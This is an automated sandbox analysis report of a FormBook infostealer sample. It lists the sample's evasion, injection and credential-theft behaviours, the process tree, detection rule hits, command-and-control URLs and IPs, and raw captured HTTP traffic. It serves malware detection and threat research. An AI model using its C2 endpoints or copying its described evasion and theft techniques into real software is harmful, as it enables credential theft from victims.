
Windows Analysis Report
YH-3-12-2024-GDL Units - Projects.exe

Overview

General Information

Sample name: YH-3-12-2024-GDL Units - Projects.exe
Analysis ID: 1567130
MD5: 36e50660f18927eb838ce85dd46778c4
SHA1: 2a81b0b315cf21f286d262a12ac0666145df7bac
SHA256: ec5bf8186eac9177d93bdf735449b9b4023631dcb3e67e1e5809dc22dbba842b
Tags: exe, user-mamrmu

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • YH-3-12-2024-GDL Units - Projects.exe (PID: 1068 cmdline: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe" MD5: 36E50660F18927EB838CE85DD46778C4)
    • svchost.exe (PID: 4076 cmdline: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • zZyhwwvEVl.exe (PID: 2924 cmdline: "C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 2188 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • zZyhwwvEVl.exe (PID: 792 cmdline: "C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1260 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", CommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", CommandLine|base64offset|contains: Rx, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", ParentImage: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe, ParentProcessId: 1068, ParentProcessName: YH-3-12-2024-GDL Units - Projects.exe, ProcessCommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", ProcessId: 4076, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", CommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", CommandLine|base64offset|contains: Rx, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", ParentImage: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe, ParentProcessId: 1068, ParentProcessName: YH-3-12-2024-GDL Units - Projects.exe, ProcessCommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", ProcessId: 4076, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-03T06:54:26.889952+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 134.0.14.158 | 80 | TCP


                AV Detection

Source: http://www.aballanet.cat/6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO | Avira URL Cloud: Label: malware
Source: http://www.aballanet.cat/6xrr/ | Avira URL Cloud: Label: malware
Source: http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5a | Avira URL Cloud: Label: malware
Source: logidant.xyz | Virustotal: Detection: 11%
Source: YH-3-12-2024-GDL Units - Projects.exe | ReversingLabs: Detection: 31%
Source: YH-3-12-2024-GDL Units - Projects.exe | Virustotal: Detection: 33%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: YH-3-12-2024-GDL Units - Projects.exe | Joe Sandbox ML: detected
Source: YH-3-12-2024-GDL Units - Projects.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: mobsync.pdbGCTL | source: svchost.exe, 00000001.00000003.1832374212.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832385716.0000000003631000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832298452.000000000361B000.00000004.00000020.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000003.2216428550.000000000145B000.00000004.00000001.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3502936165.0000000001447000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: zZyhwwvEVl.exe, 00000002.00000000.1787718772.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3502520360.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667390331.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666525007.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775542207.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1774016547.0000000003800000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1866702963.0000000004C2D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004F7E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1864869666.0000000004A78000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667390331.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666525007.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1864235310.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775542207.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1774016547.0000000003800000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000003.00000003.1866702963.0000000004C2D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004F7E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1864869666.0000000004A78000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: mobsync.pdb | source: svchost.exe, 00000001.00000003.1832374212.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832385716.0000000003631000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832298452.000000000361B000.00000004.00000020.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000003.2216428550.000000000145B000.00000004.00000001.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3502936165.0000000001447000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503963835.000000000540C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2162666518.000000003836C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503963835.000000000540C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2162666518.000000003836C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082445A GetFileAttributesW,FindFirstFileW,FindClose | 0_2_0082445A
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082C6D1 FindFirstFileW,FindClose | 0_2_0082C6D1
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_0082C75C
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0082EF95
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0082F0F2
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0082F3F3
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_008237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_008237EF
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_00823B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00823B12
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_0082BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0082BCBC
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 3_2_02E9C560 FindFirstFileW,FindNextFileW,FindClose | 3_2_02E9C560
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 4x nop then xor eax, eax | 3_2_02E89D90
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_04C704EE

                Networking

Source: Network traffic | Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49737 -> 134.0.14.158:80
                Source: DNS query: www.izmirescortg.xyz
                Source: DNS query: www.logidant.xyz
                Source: DNS query: www.tals.xyz
Source: Joe Sandbox View | IP Address: 45.141.156.114
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | ASN Name: YURTEH-ASUA
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe | Code function: 0_2_008322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_008322EE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 05:54:42 GMTserver: Apacheset-cookie: __tad=1733205282.4810970; expires=Fri, 01-Dec-2034 05:54:42 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 
5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 05:54:44 GMTserver: Apacheset-cookie: __tad=1733205284.6289982; expires=Fri, 01-Dec-2034 05:54:44 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 
5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 05:54:47 GMTserver: Apacheset-cookie: __tad=1733205287.1341641; expires=Fri, 01-Dec-2034 05:54:47 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 
5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
Source: global traffic | HTTP traffic detected: GET /lnl7/?rfJh=kAPJ1zL1a1XedmcoetGOcXX+BQ0sya6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZSqhyZMy+6OBPTB2cT6zQPdPsX8z060ybXY=&O258-=pHdHBdXhwLO HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.izmirescortg.xyz | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic | HTTP traffic detected: GET /6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLO HTTP/1.1 | Accept: */* | Accept-Language: en-US | Connection: close | Host: www.aballanet.cat | User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
